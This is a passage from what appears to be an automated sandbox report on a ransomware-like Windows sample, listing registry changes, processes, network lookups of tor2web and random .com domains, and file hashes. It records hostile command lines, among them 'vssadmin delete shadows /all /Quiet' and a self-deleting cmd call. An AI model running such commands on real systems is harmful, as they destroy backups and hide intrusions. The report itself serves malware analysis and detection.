| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4AEBD0B1-A24B-11EF-A087-5EE01BAFE073} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc50000000000200000000001066000000010000200000005c4a7c21eb06f2cba6d202bf09ba244629d4e6ee983b9be9c27149045ab48ebf000000000e8000000002000020000000d02cc8d281bfa366ffdddd89e94f3e9d6ae2148420fa5ba0b5675cc3544a646520000000289ab29cee570ba7c5d86c222a672075fe45f9aa3bbb1937a78675da9af74b3b40000000b22a69e8ff1e62f2971376c948a9a00199c66facc48a0665d4dec939338cb378487ad48d11ab697a94a367491fa2778f89586b3cce8a39ec5d68d7ecf5b16928 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe
"C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe"
C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe
C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe
C:\Users\Admin\AppData\Roaming\vtpvaio.exe
C:\Users\Admin\AppData\Roaming\vtpvaio.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\E906FA~1.EXE >> NUL
C:\Users\Admin\AppData\Roaming\vtpvaio.exe
C:\Users\Admin\AppData\Roaming\vtpvaio.exe
C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://3kxwjihmkgibht2s.wh47f2as19.com/?enc=1GHhpfZuUVY1VcG3nWAFyuuodC4NNprDPZ
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1880 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:209933 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:406534 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:1061910 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:1258514 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:1258524 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:1192984 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:1651745 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:1520690 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:1586220 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:3159095 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:3093552 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | epmhyca5ol6plmx3.wh47f2as19.com | udp |
| US | 8.8.8.8:53 | 7tno4hib47vlep5o.7hwr34n18.com | udp |
| US | 8.8.8.8:53 | epmhyca5ol6plmx3.tor2web.blutmagie.de | udp |
| US | 8.8.8.8:53 | epmhyca5ol6plmx3.tor2web.fi | udp |
| US | 8.8.8.8:53 | 3kxwjihmkgibht2s.wh47f2as19.com | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
memory/2540-0-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2540-10-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2540-15-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2540-16-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2540-12-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2540-9-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2540-6-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2540-4-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2540-2-0x0000000000400000-0x0000000000472000-memory.dmp
memory/1732-13-0x0000000000400000-0x0000000000448000-memory.dmp
\Users\Admin\AppData\Roaming\vtpvaio.exe
| MD5 | 6d3d62a4cff19b4f2cc7ce9027c33be8 |
| SHA1 | e906fa3d51e86a61741b3499145a114e9bfb7c56 |
| SHA256 | afaba2400552c7032a5c4c6e6151df374d0e98dc67204066281e30e6699dbd18 |
| SHA512 | 973643639cb02491b86d5b264ee8118a67d8a83453307aea95de2f4c6aa55819d37730c41dc3338116ebe86f9a4f2bba7d9537ea744ae08b9755f05c15153fad |
memory/2492-42-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2492-43-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2332-40-0x0000000000400000-0x0000000000448000-memory.dmp
memory/2540-38-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2492-45-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2492-47-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2492-55-0x0000000000400000-0x0000000000472000-memory.dmp
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\HELP_RESTORE_FILES.txt
| MD5 | ea0e265370176a2125161480c14be201 |
| SHA1 | 79f7aec6c393a191cdeac916b16ef9a774b1c61c |
| SHA256 | 892209dd40815239c9d4dc5fd19eb3d2848ee406bac9b87d000a16bd71e7a435 |
| SHA512 | 0d294b6a4830d6f6f042c4f5ad3ee3fb3b9a1b2ca93412add673778d8e4c379973bbe765cd94016df287beff345af8add091d9c865b035b56a659dc7ff7e64ba |
memory/2492-934-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2492-2201-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2492-2208-0x0000000000400000-0x0000000000472000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{4AEBD0B1-A24B-11EF-A087-5EE01BAFE073}.dat
| MD5 | bd912ba5c213cdc9775bf38fa8b1f376 |
| SHA1 | 1a707da2fb4cd2a185a126caa4ca71b006a985a3 |
| SHA256 | 83231e763fd50d70fb0f325a0a7793828d77dde2f659310e9d976d3b4a33b771 |
| SHA512 | b31738886303913bf4f89bcabf4d0d8bdaf31c990f467f126fcbb50915601a0316880f00079332cfcbdaed6423c808030f61434a54fd5fab1841e6b20d50a882 |
C:\Users\Admin\AppData\Roaming\log.html
| MD5 | 5b7ea1cf53dadb9f8b2829c94869f511 |
| SHA1 | 618560f953e44738f4c36f5115b2fb8f031d27ba |
| SHA256 | 338c1aee60c5b1ab62dd4bd81f545e2b83505cb4e8ef302620396d958b7bf9f0 |
| SHA512 | d47cdbe154ccebd33550cfd0c40e6e4ed9aec9cfb24d895cdd7f9cc820fd98df580917d3af1dcd1d8e92123e2024a0499ea34416bad2a148e1d8ddc5e2d82a15 |
C:\Users\Admin\AppData\Local\Temp\CabD7FA.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarD8C8.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6233c222bfc366fee9b8bce54cc50f1e |
| SHA1 | c0e66b1fa93180b0a3712e603d93e28a4112e895 |
| SHA256 | 16d0ae88fb66046945a286f4c2717cace2828834e80a68c6413a6397ed2904c0 |
| SHA512 | 13da666d141c421b23de47fad7d9c89c7a67d968ae7ffefab920a3ef80dde4cb47b7143dadfd49cb767e92037f51daa086e23dd988f1611777d4c7d47f96f8f6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 83313a8b770de362455482f5993c252b |
| SHA1 | 8578218ee4401a985c57ceefb379212050ffdf36 |
| SHA256 | 8da97d2935d8aa0d37ad8f7081989a16f7a33439f164ef3c65ea8a4e2570e1a6 |
| SHA512 | ef2dab4ba9f62d6c3e0cbf3bb7145c7a465580f66ade6996a6812d789a1e1aff7654707585036da0dcf47f27064cb1f898816a2f6f5b85c92509df59a22c7ab7 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8f25269dbe7792dd48f35097ccb953e8 |
| SHA1 | 77d3f716240023c9ff1eb2a9fdbbe4ec8538dce8 |
| SHA256 | adee7e936318a8b8e83d8518198fc339c5bf068b25ae11d18cd68b4bb3d7050e |
| SHA512 | 15c1b97e7b3b68f4f7e521b826eca027948a9fa05aa4bd9e1929af77ae25886cd8d9be452be1c40a30c154ca42f5eb2ee35e1c0ba35eb9568be3d2adc0d85dcd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 236d8619c23f328772d647365b53904e |
| SHA1 | 7278c738849c14b788bfee71cf4904fce1c0168a |
| SHA256 | 2106e815ca3b1d9e3ce48e75775d7983c10708566fd5ba5364e230b94545d798 |
| SHA512 | cfc38dcb135d58dbec3f03eb15766b194f474dccb1e21248cd00a599025240cb4e366024104c3c6c0d81c79562360cc9af9493d3adbb2bc50165432f5b72b87c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 20c0b7ab310b014b06c4ff44c5128a3a |
| SHA1 | c839e907749d1881c5028cecf2cc61c7830115ea |
| SHA256 | b9803e5fa68c6515bf9fca9ff5b23f704043af90645ac76e029efabc8af55eea |
| SHA512 | 3ac705a69c7493e135604ef1cc050c7f6a3e6ae34be8c83be979301e6b5da984f0f870063d9f00fc5cedbdb3cbc08b8f16ae82015b8fe75706823101be03f9f2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 505c2435a20de56eae4824f736e00432 |
| SHA1 | 357174b0b893dfb79d45ee39c1bbdfeb4601c7f9 |
| SHA256 | 9fcf43ba5df03dde25820b7a529f56c39cb018a40613481f34b7ac69e866e87e |
| SHA512 | 46d170eb97042627294299a09350667a0c4175c3bb58afb5284f5f74849c8bdf125cb3675f9e047306e30349404c3651361c6a130f7ec54d413015634a162044 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 918e627b7e1c21a6f64cd36f378982a4 |
| SHA1 | cfdeb9c5c2ccdb8e416e0c658a7a92f72092209d |
| SHA256 | 217f57dda5dca2b86de596ad75f068c2596ca007e811923401e2bda7289f332f |
| SHA512 | aa807c66d436c404a41870bcc5888f601f0e51f8869ffea55bd3c590d937ed738af43eef3a754833131b1b486de283b13e5ab612b75ebf40e072c8fcbddb8d6d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c5062016d9389e1c1b8a9828764d0f92 |
| SHA1 | 326ec606cc86c39e6bba7855909f08c391c7e556 |
| SHA256 | aabbcb4a4368583078e89790e99c060448a401137c48bc575c065e2a5bd25ba3 |
| SHA512 | c6f99515cc7021fdfa211a1439d83086afba4158649a39cc8cb829a7f5c77cffb3e9bc655386c2462b3557296ee1f7ec611dc3c11e239ad7c274a5e485e4ebe6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a8c4ed6a472220e75ff582387bbf31e1 |
| SHA1 | f9a03fe73cf4e70aa307e6b6d297c5c941c11d7a |
| SHA256 | 933f5c3947883ae24bded09187fe3845669718b266a463f99f7da27c622123e6 |
| SHA512 | da7b3e3d1b146f5761dd79835370be16d18191173db0d0d11589b5df4983d40cc1de38bb953672aaf4998bc99d799cef1f8f01aee86c7f8b389540b42970c239 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\dnserror[1]
| MD5 | 73c70b34b5f8f158d38a94b9d7766515 |
| SHA1 | e9eaa065bd6585a1b176e13615fd7e6ef96230a9 |
| SHA256 | 3ebd34328a4386b4eba1f3d5f1252e7bd13744a6918720735020b4689c13fcf4 |
| SHA512 | 927dcd4a8cfdeb0f970cb4ee3f059168b37e1e4e04733ed3356f77ca0448d2145e1abdd4f7ce1c6ca23c1e3676056894625b17987cc56c84c78e73f60e08fc0d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EOYL2MRI\errorPageStrings[1]
| MD5 | e3e4a98353f119b80b323302f26b78fa |
| SHA1 | 20ee35a370cdd3a8a7d04b506410300fd0a6a864 |
| SHA256 | 9466d620dc57835a2475f8f71e304f54aee7160e134ba160baae0f19e5e71e66 |
| SHA512 | d8e4d73c76804a5abebd5dbc3a86dcdb6e73107b873175a8de67332c113fb7c4899890bf7972e467866fa4cd100a7e2a10a770e5a9c41cbf23b54351b771dcee |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D6V88JEY\NewErrorPageTemplate[1]
| MD5 | cdf81e591d9cbfb47a7f97a2bcdb70b9 |
| SHA1 | 8f12010dfaacdecad77b70a3e781c707cf328496 |
| SHA256 | 204d95c6fb161368c795bb63e538fe0b11f9e406494bb5758b3b0d60c5f651bd |
| SHA512 | 977dcc2c6488acaf0e5970cef1a7a72c9f9dc6bb82da54f057e0853c8e939e4ab01b163eb7a5058e093a8bc44ecad9d06880fdc883e67e28ac67fee4d070a4cc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\httpErrorPagesScripts[2]
| MD5 | 3f57b781cb3ef114dd0b665151571b7b |
| SHA1 | ce6a63f996df3a1cccb81720e21204b825e0238c |
| SHA256 | 46e019fa34465f4ed096a9665d1827b54553931ad82e98be01edb1ddbc94d3ad |
| SHA512 | 8cbf4ef582332ae7ea605f910ad6f8a4bc28513482409fa84f08943a72cac2cf0fa32b6af4c20c697e1fac2c5ba16b5a64a23af0c11eefbf69625b8f9f90c8fa |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms
| MD5 | 4681df363fb8d5877272629c5ff09770 |
| SHA1 | 44ae77eace4951702d9397327ce36563d64a87e6 |
| SHA256 | d4e30794915438ab9173684f1f3975f81ea94e1eaaffd79feb14a5f5d5e0d8c2 |
| SHA512 | ca43295924acbb7591165f33ea41eb0a32d6f7b3801d9955ecaa00fad7951ef473545c8ee77aa89c6df44d82a36493e284943aa386f675db7615bbe9a595cc15 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7ef53f646ad9eeff7e60df1a8fe38e61 |
| SHA1 | d7275cd4d5caf240463b6a648eb6441e80e5f882 |
| SHA256 | 4ef7c77dd5c0e7d31df67a51f2d6b698683f9440b3e41339f6290fe3acf0789c |
| SHA512 | e19814e789fdce084c616ce204806aa18cc694fc4bd035ad90798dfaa4f0de0c82d0c9b4aeb1443727771312de56371360dffee01d137a6b227d716c1004f197 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d2c464047875714ed6066e3f43e78c08 |
| SHA1 | 4c14b8cf181c454816638f09836c3a48a2e99c40 |
| SHA256 | 31b7b6f07bd4823115978d377a12893bbd90d440a14ac32681320c48cb9a48b5 |
| SHA512 | 94effa4a1ea6c632f39fd3547a8a41b1dce4ec6ee7dbac4c1feadb10b0c068f9c88c38c9ff7b1d06f33937492d63c71fb0beefcf45744700bd2fcfb825fdd231 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 737192460782a76fc04a6bb4401fe6a1 |
| SHA1 | 0bfe9d15707f7424cdb5988a45cf802f94e8e346 |
| SHA256 | b9eccb10bd5758f729a38691a45e8b7c9b002418239270c73120565a213e2549 |
| SHA512 | f603e8f9da9f192f794e33a569952cda99225341bf3b1276c7451f5665d765f38a008cc26ac0f37623ee36431491a91a00c9407e376e8a6c9afd7a2dc39a3baf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c2fc923e0a932f4b6b57a1633138c6bc |
| SHA1 | 70f8fdf906682fbb16a48f792f4f7ffffc10c6de |
| SHA256 | 8e269ee0b327e1ca49fcfe064367f3271ef9786755252a89244fa56bb8db3a2c |
| SHA512 | 52d0e5b362df165e8ce365dbe76771a577515f15198c776865449f7dd8846c85666f35824f2f2f98ed590e4a8e0b4b1e19dc7b3000f9bbe537fbf65d34565abf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 630c1b6df533148ab7f945c05d59f574 |
| SHA1 | 86a79618c6b268fa459c7345783794eabb5c8ac0 |
| SHA256 | b4cafca9459bc16a09363bada59cd63ac9bea31c79d7e033d76d2f423986f253 |
| SHA512 | a80636f104bcbb0cdce3ea6f282958a87001515eaad02c57ec7b1a0080ddfa2eeffaee8ccf17fd2a69760d849d5705ed9c5a0234effa8efa03c599eea01a3a54 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4da49de4c52e7aa88566521ded586596 |
| SHA1 | b88dce76d33081af05cfe15d5644fc66589e45ec |
| SHA256 | eb2a6f61883225e0f484d496da3ceed862cc0f8bc41f2d4b8ad2e88ae2274846 |
| SHA512 | ebac2d44e1035315e14f4c502bfbb1ac398a24ef845e293ff70d003fd9b3e817d0676f2aed3f75572025fee41f7dc01160a6dce1199f0b51edfb311bd3656759 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3f10a3878739772ccfd8a4c97efa1815 |
| SHA1 | 9e3b0f7bcb3615f8b8eb915f5520ac861f615c85 |
| SHA256 | 5fde88699edbc271a5f203c83ab1bca3d7d77b053c05104937a27980dfc27946 |
| SHA512 | 64e6a21324856b9930de2970666fdf3ac7db8d30d8de027cc5fce47b7c4965a498636c37b1b9d2defccdda561577089e165bf20abd1ca2550d58240383f25d3c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 455badbf99168ffc1f417068b34a881b |
| SHA1 | cb60c5c1ba9da48d0210ea210e3676e6eb656fa9 |
| SHA256 | 8e3f5f7c532353cbf359c4df4075ecbcaa1b8294b2ab5b116763856fa13e77f0 |
| SHA512 | 778ea44c4b88fc69e0c18388f54b4a407007fdd67589ae6895afd3b4378e475a05f1bc01ac57aeb11f06cc1766ed47f51fc97687627cbc4b1ea10f2d32754904 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 123b22e59e9ac59b52d3632cd047d2c6 |
| SHA1 | e0f3fa71342787058792dd7c9160e2635d0bfa9c |
| SHA256 | ca76e3abfbcb2c87da18de22bc81ccf045d267f0b79a1c28f28612e4a9a276fa |
| SHA512 | 255196fe143c7a7e13a57122f2bdc09913237e9e0d4c7d1d00d36ff0efa007ccc86b4d7525edf4d80f27ff3c5aadef8360969ada20835af6179ca8e425702fbb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5bda05f21aac6a505c7f9cbd76545a65 |
| SHA1 | 34faf083ae7d55a05081a4f2b839e21ddf1bef48 |
| SHA256 | 15c2412285326ccc7be5887725e5ddfde53d94e453028a368395032ef4afecb4 |
| SHA512 | f28165df403dcda9b520e5029b7ac3928d6dced10e1a24796072e92dc71bb01da23089f06fb07a86abe12edc4fd6c7d738169c095fd472051fb7445195c3d8f2 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-14 05:42
Reported
2024-11-14 05:44
Platform
win10ltsc2021-20241023-en
Max time kernel
100s
Max time network
111s
Command Line
Signatures
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
